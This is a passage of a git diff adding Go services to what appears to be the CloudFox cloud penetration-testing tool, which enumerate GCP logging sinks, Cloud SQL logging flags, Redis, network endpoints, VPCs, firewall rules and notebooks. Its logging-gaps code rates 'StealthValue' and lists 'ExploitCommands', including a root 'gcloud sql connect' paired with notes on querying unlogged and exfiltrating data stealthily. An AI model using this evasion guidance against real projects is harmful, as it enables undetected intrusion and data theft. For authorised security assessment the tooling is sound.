"on" { + hasQueryLogging = true + } + // PostgreSQL flags + if flag.Name == "log_statement" && flag.Value == "all" { + hasQueryLogging = true + } + if 
flag.Name == "log_connections" && flag.Value == "on" { + hasConnectionLogging = true + } + } + + if !hasQueryLogging { + missingLogs = append(missingLogs, "Query logging not enabled") + loggingStatus = "partial" + } + if !hasConnectionLogging { + missingLogs = append(missingLogs, "Connection logging not enabled") + } + } else { + missingLogs = append(missingLogs, "No logging flags configured") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "cloudsql", + ResourceName: instance.Name, + ProjectID: projectID, + Location: instance.Region, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "HIGH", + Recommendations: []string{ + "Enable query and connection logging", + "For MySQL: SET GLOBAL general_log = 'ON'", + "For PostgreSQL: ALTER SYSTEM SET log_statement = 'all'", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Connect without query logging:\ngcloud sql connect %s --user=root --project=%s", instance.Name, projectID), + "# Execute queries without being logged", + "# Exfiltrate data stealthily", + }, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +func (s *LoggingGapsService) checkLogSinks(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + client, err := logging.NewConfigClient(ctx) + if err != nil { + return nil, err + } + defer client.Close() + + var gaps []LoggingGap + + parent := fmt.Sprintf("projects/%s", projectID) + it := client.ListSinks(ctx, &loggingpb.ListSinksRequest{Parent: parent}) + + sinkCount := 0 + for { + sink, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + sinkCount++ + + // Check for disabled sinks + if sink.Disabled { + gap := LoggingGap{ + ResourceType: "log-sink", + ResourceName: sink.Name, + ProjectID: projectID, + Location: "global", + LoggingStatus: "disabled", + MissingLogs: []string{"Sink is disabled"}, + StealthValue: "HIGH", + Recommendations: []string{ + "Enable the log sink 
or remove if not needed", + }, + ExploitCommands: []string{ + "# Logs matching this sink filter are not being exported", + fmt.Sprintf("# Sink filter: %s", sink.Filter), + }, + } + gaps = append(gaps, gap) + } + + // Check for overly permissive exclusion filters + for _, exclusion := range sink.Exclusions { + if !exclusion.Disabled { + gap := LoggingGap{ + ResourceType: "log-exclusion", + ResourceName: fmt.Sprintf("%s/%s", sink.Name, exclusion.Name), + ProjectID: projectID, + Location: "global", + LoggingStatus: "exclusion-active", + MissingLogs: []string{fmt.Sprintf("Exclusion filter: %s", exclusion.Filter)}, + StealthValue: "MEDIUM", + Recommendations: []string{ + "Review exclusion filter for security implications", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Logs matching this filter are excluded: %s", exclusion.Filter), + }, + } + gaps = append(gaps, gap) + } + } + } + + // Check if there are no sinks at all + if sinkCount == 0 { + gap := LoggingGap{ + ResourceType: "project", + ResourceName: projectID, + ProjectID: projectID, + Location: "global", + LoggingStatus: "no-export", + MissingLogs: []string{"No log sinks configured - logs only in Cloud Logging"}, + StealthValue: "LOW", + Recommendations: []string{ + "Configure log sinks to export logs to external storage", + "Ensures logs are preserved even if project is compromised", + }, + ExploitCommands: []string{ + "# Logs can be deleted if project is compromised", + "# Consider exporting to separate project or external SIEM", + }, + } + gaps = append(gaps, gap) + } + + return gaps, nil +} diff --git a/gcp/services/loggingService/loggingService.go b/gcp/services/loggingService/loggingService.go new file mode 100644 index 00000000..d9c83cdf --- /dev/null +++ b/gcp/services/loggingService/loggingService.go @@ -0,0 +1,256 @@ +package loggingservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + logging "google.golang.org/api/logging/v2" +) + +type 
LoggingService struct{} + +func New() *LoggingService { + return &LoggingService{} +} + +// SinkInfo holds Cloud Logging sink details with security-relevant information +type SinkInfo struct { + Name string + ProjectID string + Description string + CreateTime string + UpdateTime string + + // Destination configuration + Destination string // Full destination resource name + DestinationType string // bigquery, storage, pubsub, logging + DestinationBucket string // For storage destinations + DestinationDataset string // For BigQuery destinations + DestinationTopic string // For Pub/Sub destinations + DestinationProject string // Project containing the destination + + // Filter + Filter string + Disabled bool + + // Export identity + WriterIdentity string // Service account that writes to destination + + // Inclusion/exclusion + ExclusionFilters []string + + // Cross-project indicator + IsCrossProject bool +} + +// MetricInfo holds log-based metric details +type MetricInfo struct { + Name string + ProjectID string + Description string + Filter string + CreateTime string + UpdateTime string + + // Metric configuration + MetricKind string // DELTA, GAUGE, CUMULATIVE + ValueType string // INT64, DOUBLE, DISTRIBUTION + + // Labels extracted from logs + LabelCount int +} + +// Sinks retrieves all logging sinks in a project +func (ls *LoggingService) Sinks(projectID string) ([]SinkInfo, error) { + ctx := context.Background() + + service, err := logging.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + var sinks []SinkInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Sinks.List(parent) + err = call.Pages(ctx, func(page *logging.ListSinksResponse) error { + for _, sink := range page.Sinks { + info := parseSinkInfo(sink, projectID) + sinks = append(sinks, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + 
return sinks, nil +} + +// Metrics retrieves all log-based metrics in a project +func (ls *LoggingService) Metrics(projectID string) ([]MetricInfo, error) { + ctx := context.Background() + + service, err := logging.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + var metrics []MetricInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Metrics.List(parent) + err = call.Pages(ctx, func(page *logging.ListLogMetricsResponse) error { + for _, metric := range page.Metrics { + info := parseMetricInfo(metric, projectID) + metrics = append(metrics, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + return metrics, nil +} + +// parseSinkInfo extracts relevant information from a logging sink +func parseSinkInfo(sink *logging.LogSink, projectID string) SinkInfo { + info := SinkInfo{ + Name: sink.Name, + ProjectID: projectID, + Description: sink.Description, + CreateTime: sink.CreateTime, + UpdateTime: sink.UpdateTime, + Destination: sink.Destination, + Filter: sink.Filter, + Disabled: sink.Disabled, + WriterIdentity: sink.WriterIdentity, + } + + // Parse destination type and details + info.DestinationType, info.DestinationProject = parseDestination(sink.Destination) + + switch info.DestinationType { + case "storage": + info.DestinationBucket = extractBucketName(sink.Destination) + case "bigquery": + info.DestinationDataset = extractDatasetName(sink.Destination) + case "pubsub": + info.DestinationTopic = extractTopicName(sink.Destination) + } + + // Check if cross-project + if info.DestinationProject != "" && info.DestinationProject != projectID { + info.IsCrossProject = true + } + + // Parse exclusion filters + for _, exclusion := range sink.Exclusions { + if !exclusion.Disabled { + info.ExclusionFilters = append(info.ExclusionFilters, exclusion.Filter) + } + } + + return info +} + +// parseMetricInfo 
extracts relevant information from a log-based metric +func parseMetricInfo(metric *logging.LogMetric, projectID string) MetricInfo { + info := MetricInfo{ + Name: metric.Name, + ProjectID: projectID, + Description: metric.Description, + Filter: metric.Filter, + CreateTime: metric.CreateTime, + UpdateTime: metric.UpdateTime, + } + + if metric.MetricDescriptor != nil { + info.MetricKind = metric.MetricDescriptor.MetricKind + info.ValueType = metric.MetricDescriptor.ValueType + info.LabelCount = len(metric.MetricDescriptor.Labels) + } + + return info +} + +// parseDestination parses the destination resource name +func parseDestination(destination string) (destType string, project string) { + switch { + case strings.HasPrefix(destination, "storage.googleapis.com/"): + destType = "storage" + // Format: storage.googleapis.com/bucket-name + parts := strings.Split(destination, "/") + if len(parts) >= 2 { + // Bucket name might encode project, but typically doesn't + project = "" + } + case strings.HasPrefix(destination, "bigquery.googleapis.com/"): + destType = "bigquery" + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + case strings.HasPrefix(destination, "pubsub.googleapis.com/"): + destType = "pubsub" + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + case strings.HasPrefix(destination, "logging.googleapis.com/"): + destType = "logging" + // Format: logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + if idx := strings.Index(destination, "/projects/"); idx 
>= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + default: + destType = "unknown" + } + return +} + +// extractBucketName extracts bucket name from storage destination +func extractBucketName(destination string) string { + // Format: storage.googleapis.com/bucket-name + parts := strings.SplitN(destination, "/", 2) + if len(parts) >= 2 { + return parts[1] + } + return destination +} + +// extractDatasetName extracts dataset name from BigQuery destination +func extractDatasetName(destination string) string { + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + if idx := strings.Index(destination, "/datasets/"); idx >= 0 { + remainder := destination[idx+len("/datasets/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + return remainder[:slashIdx] + } + return remainder + } + return "" +} + +// extractTopicName extracts topic name from Pub/Sub destination +func extractTopicName(destination string) string { + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + if idx := strings.Index(destination, "/topics/"); idx >= 0 { + return destination[idx+len("/topics/"):] + } + return "" +} diff --git a/gcp/services/memorystoreService/memorystoreService.go b/gcp/services/memorystoreService/memorystoreService.go new file mode 100644 index 00000000..dd3fd006 --- /dev/null +++ b/gcp/services/memorystoreService/memorystoreService.go @@ -0,0 +1,104 @@ +package memorystoreservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + redis "google.golang.org/api/redis/v1" +) + +type MemorystoreService struct { + session *gcpinternal.SafeSession +} + +func New() *MemorystoreService { + return &MemorystoreService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *MemorystoreService { + return &MemorystoreService{session: session} +} + +// 
RedisInstanceInfo represents a Redis instance +type RedisInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Tier string `json:"tier"` // BASIC or STANDARD_HA + MemorySizeGB int64 `json:"memorySizeGb"` + RedisVersion string `json:"redisVersion"` + Host string `json:"host"` + Port int64 `json:"port"` + State string `json:"state"` + AuthEnabled bool `json:"authEnabled"` + TransitEncryption string `json:"transitEncryption"` // DISABLED, SERVER_AUTHENTICATION + ConnectMode string `json:"connectMode"` // DIRECT_PEERING or PRIVATE_SERVICE_ACCESS + AuthorizedNetwork string `json:"authorizedNetwork"` + ReservedIPRange string `json:"reservedIpRange"` + CreateTime string `json:"createTime"` +} + +// ListRedisInstances retrieves all Redis instances in a project +func (s *MemorystoreService) ListRedisInstances(projectID string) ([]RedisInstanceInfo, error) { + ctx := context.Background() + var service *redis.Service + var err error + + if s.session != nil { + service, err = redis.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = redis.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") + } + + var instances []RedisInstanceInfo + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *redis.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := s.parseRedisInstance(instance, projectID) + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") + } + + return instances, nil +} + +func (s *MemorystoreService) parseRedisInstance(instance *redis.Instance, projectID string) RedisInstanceInfo { + return RedisInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, 
+ Location: instance.LocationId, + DisplayName: instance.DisplayName, + Tier: instance.Tier, + MemorySizeGB: instance.MemorySizeGb, + RedisVersion: instance.RedisVersion, + Host: instance.Host, + Port: instance.Port, + State: instance.State, + AuthEnabled: instance.AuthEnabled, + TransitEncryption: instance.TransitEncryptionMode, + ConnectMode: instance.ConnectMode, + AuthorizedNetwork: instance.AuthorizedNetwork, + ReservedIPRange: instance.ReservedIpRange, + CreateTime: instance.CreateTime, + } +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/networkEndpointsService/networkEndpointsService.go b/gcp/services/networkEndpointsService/networkEndpointsService.go new file mode 100644 index 00000000..77debf52 --- /dev/null +++ b/gcp/services/networkEndpointsService/networkEndpointsService.go @@ -0,0 +1,284 @@ +package networkendpointsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + compute "google.golang.org/api/compute/v1" + servicenetworking "google.golang.org/api/servicenetworking/v1" +) + +type NetworkEndpointsService struct{} + +func New() *NetworkEndpointsService { + return &NetworkEndpointsService{} +} + +// PrivateServiceConnectEndpoint represents a PSC endpoint +type PrivateServiceConnectEndpoint struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + IPAddress string `json:"ipAddress"` + Target string `json:"target"` // Service attachment or API + TargetType string `json:"targetType"` // google-apis, service-attachment + ConnectionState string `json:"connectionState"` +} + +// PrivateConnection represents a private service connection (e.g., for Cloud SQL) +type PrivateConnection struct { + Name string `json:"name"` + ProjectID 
string `json:"projectId"` + Network string `json:"network"` + Service string `json:"service"` + ReservedRanges []string `json:"reservedRanges"` + PeeringName string `json:"peeringName"` + AccessibleServices []string `json:"accessibleServices"` +} + +// ServiceAttachmentIAMBinding represents an IAM binding for a service attachment +type ServiceAttachmentIAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ServiceAttachment represents a PSC service attachment (producer side) +type ServiceAttachment struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + TargetService string `json:"targetService"` + ConnectionPreference string `json:"connectionPreference"` // ACCEPT_AUTOMATIC, ACCEPT_MANUAL + ConsumerAcceptLists []string `json:"consumerAcceptLists"` + ConsumerRejectLists []string `json:"consumerRejectLists"` + EnableProxyProtocol bool `json:"enableProxyProtocol"` + NatSubnets []string `json:"natSubnets"` + ConnectedEndpoints int `json:"connectedEndpoints"` + IAMBindings []ServiceAttachmentIAMBinding `json:"iamBindings"` +} + +// GetPrivateServiceConnectEndpoints retrieves PSC forwarding rules +func (s *NetworkEndpointsService) GetPrivateServiceConnectEndpoints(projectID string) ([]PrivateServiceConnectEndpoint, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var endpoints []PrivateServiceConnectEndpoint + + // List forwarding rules across all regions + req := service.ForwardingRules.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for region, scopedList := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, rule := range scopedList.ForwardingRules { + // Check if this is a PSC endpoint + if 
rule.Target == "" { + continue + } + + // PSC endpoints target service attachments or Google APIs + isPSC := false + targetType := "" + + if strings.Contains(rule.Target, "serviceAttachments") { + isPSC = true + targetType = "service-attachment" + } else if strings.Contains(rule.Target, "all-apis") || + strings.Contains(rule.Target, "vpc-sc") || + rule.Target == "all-apis" { + isPSC = true + targetType = "google-apis" + } + + if !isPSC { + continue + } + + endpoint := PrivateServiceConnectEndpoint{ + Name: rule.Name, + ProjectID: projectID, + Region: regionName, + Network: extractName(rule.Network), + Subnetwork: extractName(rule.Subnetwork), + IPAddress: rule.IPAddress, + Target: rule.Target, + TargetType: targetType, + } + + // Check connection state (for PSC endpoints to service attachments) + if rule.PscConnectionStatus != "" { + endpoint.ConnectionState = rule.PscConnectionStatus + } else { + endpoint.ConnectionState = "ACTIVE" + } + + endpoints = append(endpoints, endpoint) + } + } + return nil + }) + + return endpoints, err +} + +// GetPrivateConnections retrieves private service connections +func (s *NetworkEndpointsService) GetPrivateConnections(projectID string) ([]PrivateConnection, error) { + ctx := context.Background() + service, err := servicenetworking.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "servicenetworking.googleapis.com") + } + + var connections []PrivateConnection + + // List connections for the project's networks + computeService, err := compute.NewService(ctx) + if err != nil { + return nil, err + } + + // Get all networks + networks, err := computeService.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, network := range networks.Items { + networkName := fmt.Sprintf("projects/%s/global/networks/%s", projectID, network.Name) + + // List connections for this network + resp, err := service.Services.Connections.List("services/servicenetworking.googleapis.com"). 
+ Network(networkName).Context(ctx).Do() + if err != nil { + continue // May not have permissions or no connections + } + + for _, conn := range resp.Connections { + connection := PrivateConnection{ + Name: conn.Peering, + ProjectID: projectID, + Network: network.Name, + Service: conn.Service, + ReservedRanges: conn.ReservedPeeringRanges, + PeeringName: conn.Peering, + } + + // Determine accessible services based on the connection + connection.AccessibleServices = s.determineAccessibleServices(conn.Service) + + connections = append(connections, connection) + } + } + + return connections, nil +} + +// GetServiceAttachments retrieves PSC service attachments (producer side) +func (s *NetworkEndpointsService) GetServiceAttachments(projectID string) ([]ServiceAttachment, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var attachments []ServiceAttachment + + req := service.ServiceAttachments.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ServiceAttachmentAggregatedList) error { + for region, scopedList := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, attachment := range scopedList.ServiceAttachments { + sa := ServiceAttachment{ + Name: attachment.Name, + ProjectID: projectID, + Region: regionName, + TargetService: extractName(attachment.TargetService), + ConnectionPreference: attachment.ConnectionPreference, + EnableProxyProtocol: attachment.EnableProxyProtocol, + } + + // Extract NAT subnets + for _, subnet := range attachment.NatSubnets { + sa.NatSubnets = append(sa.NatSubnets, extractName(subnet)) + } + + // Count connected endpoints + if attachment.ConnectedEndpoints != nil { + sa.ConnectedEndpoints = len(attachment.ConnectedEndpoints) + } + + // Extract consumer accept/reject lists + for _, accept := range 
attachment.ConsumerAcceptLists { + sa.ConsumerAcceptLists = append(sa.ConsumerAcceptLists, accept.ProjectIdOrNum) + } + for _, reject := range attachment.ConsumerRejectLists { + sa.ConsumerRejectLists = append(sa.ConsumerRejectLists, reject) + } + + // Get IAM bindings for the service attachment + sa.IAMBindings = s.getServiceAttachmentIAMBindings(ctx, service, projectID, regionName, attachment.Name) + + attachments = append(attachments, sa) + } + } + return nil + }) + + return attachments, err +} + +// getServiceAttachmentIAMBindings retrieves IAM bindings for a service attachment +func (s *NetworkEndpointsService) getServiceAttachmentIAMBindings(ctx context.Context, service *compute.Service, projectID, region, attachmentName string) []ServiceAttachmentIAMBinding { + policy, err := service.ServiceAttachments.GetIamPolicy(projectID, region, attachmentName).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []ServiceAttachmentIAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, ServiceAttachmentIAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + +func (s *NetworkEndpointsService) determineAccessibleServices(service string) []string { + // Map service names to what they provide access to + serviceMap := map[string][]string{ + "servicenetworking.googleapis.com": {"Cloud SQL", "Memorystore", "Filestore", "Cloud Build"}, + } + + if services, ok := serviceMap[service]; ok { + return services + } + return []string{service} +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/networkService/networkService.go b/gcp/services/networkService/networkService.go index 382db204..c104ea2c 100644 --- a/gcp/services/networkService/networkService.go +++ 
b/gcp/services/networkService/networkService.go @@ -7,6 +7,7 @@ import ( "strings" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/compute/v1" ) @@ -57,17 +58,30 @@ type Endpoint struct { } type NetwworkService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new NetworkService (legacy - uses ADC directly) func New() *NetwworkService { return &NetwworkService{} } +// NewWithSession creates a NetworkService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *NetwworkService { + return &NetwworkService{session: session} +} + // Returns firewall rules for a project. func (ns *NetwworkService) FirewallRules(projectID string) ([]*compute.Firewall, error) { ctx := context.Background() - computeService, err := compute.NewService(ctx) + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } if err != nil { return nil, err } @@ -256,5 +270,276 @@ func parseFirewallRule(fw *compute.Firewall, projectID string) (FirewallRule, er }, nil } -// TODO -// func (ns *NetworkService) ForwardingRules() {} +// VPCInfo holds VPC network details +type VPCInfo struct { + Name string + ProjectID string + Description string + AutoCreateSubnetworks bool + RoutingMode string // REGIONAL or GLOBAL + Mtu int64 + Subnetworks []string + Peerings []VPCPeering + CreationTime string +} + +// VPCPeering holds VPC peering details +type VPCPeering struct { + Name string + Network string + State string + ExportCustomRoutes bool + ImportCustomRoutes bool + ExchangeSubnetRoutes bool +} + +// SubnetInfo holds subnet details +type SubnetInfo struct { + Name string + ProjectID string + Region string + Network 
string + IPCidrRange string + GatewayAddress string + PrivateIPGoogleAccess bool + Purpose string + StackType string + CreationTime string +} + +// FirewallRuleInfo holds enhanced firewall rule details for security analysis +type FirewallRuleInfo struct { + Name string + ProjectID string + Description string + Network string + Priority int64 + Direction string // INGRESS or EGRESS + Disabled bool + + // Source/Destination + SourceRanges []string + SourceTags []string + SourceSAs []string + DestinationRanges []string + TargetTags []string + TargetSAs []string + + // Traffic + AllowedProtocols map[string][]string // protocol -> ports + DeniedProtocols map[string][]string + + // Security analysis + IsPublicIngress bool // 0.0.0.0/0 in source ranges + IsPublicEgress bool // 0.0.0.0/0 in destination ranges + AllowsAllPorts bool // Empty ports = all ports + LoggingEnabled bool // Firewall logging enabled +} + +// Networks retrieves all VPC networks in a project +func (ns *NetwworkService) Networks(projectID string) ([]VPCInfo, error) { + ctx := context.Background() + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + + var networks []VPCInfo + + networkList, err := computeService.Networks.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, network := range networkList.Items { + info := VPCInfo{ + Name: network.Name, + ProjectID: projectID, + Description: network.Description, + AutoCreateSubnetworks: network.AutoCreateSubnetworks, + RoutingMode: network.RoutingConfig.RoutingMode, + Mtu: network.Mtu, + Subnetworks: network.Subnetworks, + CreationTime: network.CreationTimestamp, + } + + // Parse peerings + for _, peering := range network.Peerings { + info.Peerings = append(info.Peerings, VPCPeering{ + Name: peering.Name, + Network: 
peering.Network, + State: peering.State, + ExportCustomRoutes: peering.ExportCustomRoutes, + ImportCustomRoutes: peering.ImportCustomRoutes, + ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, + }) + } + + networks = append(networks, info) + } + + return networks, nil +} + +// Subnets retrieves all subnets in a project +func (ns *NetwworkService) Subnets(projectID string) ([]SubnetInfo, error) { + ctx := context.Background() + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + + var subnets []SubnetInfo + + // List subnets across all regions + subnetList, err := computeService.Subnetworks.AggregatedList(projectID).Do() + if err != nil { + return nil, err + } + + for _, scopedList := range subnetList.Items { + for _, subnet := range scopedList.Subnetworks { + info := SubnetInfo{ + Name: subnet.Name, + ProjectID: projectID, + Region: extractRegionFromURL(subnet.Region), + Network: extractNameFromURL(subnet.Network), + IPCidrRange: subnet.IpCidrRange, + GatewayAddress: subnet.GatewayAddress, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + StackType: subnet.StackType, + CreationTime: subnet.CreationTimestamp, + } + subnets = append(subnets, info) + } + } + + return subnets, nil +} + +// FirewallRulesEnhanced retrieves firewall rules with security analysis +func (ns *NetwworkService) FirewallRulesEnhanced(projectID string) ([]FirewallRuleInfo, error) { + ctx := context.Background() + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + + var rules []FirewallRuleInfo + + firewallList, err := 
computeService.Firewalls.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, fw := range firewallList.Items { + info := FirewallRuleInfo{ + Name: fw.Name, + ProjectID: projectID, + Description: fw.Description, + Network: extractNameFromURL(fw.Network), + Priority: fw.Priority, + Direction: fw.Direction, + Disabled: fw.Disabled, + SourceRanges: fw.SourceRanges, + SourceTags: fw.SourceTags, + SourceSAs: fw.SourceServiceAccounts, + DestinationRanges: fw.DestinationRanges, + TargetTags: fw.TargetTags, + TargetSAs: fw.TargetServiceAccounts, + AllowedProtocols: make(map[string][]string), + DeniedProtocols: make(map[string][]string), + } + + // Parse allowed protocols + for _, allowed := range fw.Allowed { + info.AllowedProtocols[allowed.IPProtocol] = allowed.Ports + if len(allowed.Ports) == 0 { + info.AllowsAllPorts = true + } + } + + // Parse denied protocols + for _, denied := range fw.Denied { + info.DeniedProtocols[denied.IPProtocol] = denied.Ports + } + + // Security analysis - check for public ingress/egress + for _, source := range fw.SourceRanges { + if source == "0.0.0.0/0" || source == "::/0" { + info.IsPublicIngress = true + break + } + } + for _, dest := range fw.DestinationRanges { + if dest == "0.0.0.0/0" || dest == "::/0" { + info.IsPublicEgress = true + break + } + } + + // Check if logging is enabled + if fw.LogConfig != nil && fw.LogConfig.Enable { + info.LoggingEnabled = true + } + + rules = append(rules, info) + } + + return rules, nil +} + +// Helper functions +func extractNameFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func extractRegionFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +// GetComputeService returns a compute.Service instance for external use +func (ns *NetwworkService) GetComputeService(ctx context.Context) (*compute.Service, error) { 
+ var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + return computeService, nil +} diff --git a/gcp/services/notebooksService/notebooksService.go b/gcp/services/notebooksService/notebooksService.go new file mode 100644 index 00000000..fd7bed6f --- /dev/null +++ b/gcp/services/notebooksService/notebooksService.go @@ -0,0 +1,226 @@ +package notebooksservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + notebooks "google.golang.org/api/notebooks/v1" +) + +type NotebooksService struct { + session *gcpinternal.SafeSession +} + +func New() *NotebooksService { + return &NotebooksService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *NotebooksService { + return &NotebooksService{session: session} +} + +// NotebookInstanceInfo represents a Vertex AI Workbench or legacy notebook instance +type NotebookInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` + NoPublicIP bool `json:"noPublicIp"` + NoProxyAccess bool `json:"noProxyAccess"` + ProxyUri string `json:"proxyUri"` + Creator string `json:"creator"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Disk config + BootDiskType string `json:"bootDiskType"` + BootDiskSizeGB int64 `json:"bootDiskSizeGb"` + DataDiskType string `json:"dataDiskType"` + DataDiskSizeGB int64 `json:"dataDiskSizeGb"` + + // GPU config + AcceleratorType string `json:"acceleratorType"` + AcceleratorCount int64 `json:"acceleratorCount"` + + // Other config + InstallGpuDriver bool 
`json:"installGpuDriver"` + CustomContainer bool `json:"customContainer"` +} + +// RuntimeInfo represents a managed notebook runtime +type RuntimeInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + RuntimeType string `json:"runtimeType"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` +} + +// ListInstances retrieves all notebook instances +func (s *NotebooksService) ListInstances(projectID string) ([]NotebookInstanceInfo, error) { + ctx := context.Background() + var service *notebooks.Service + var err error + + if s.session != nil { + service, err = notebooks.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = notebooks.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + var instances []NotebookInstanceInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *notebooks.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := s.parseInstance(instance, projectID) + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + return instances, nil +} + +// ListRuntimes retrieves all managed notebook runtimes +func (s *NotebooksService) ListRuntimes(projectID string) 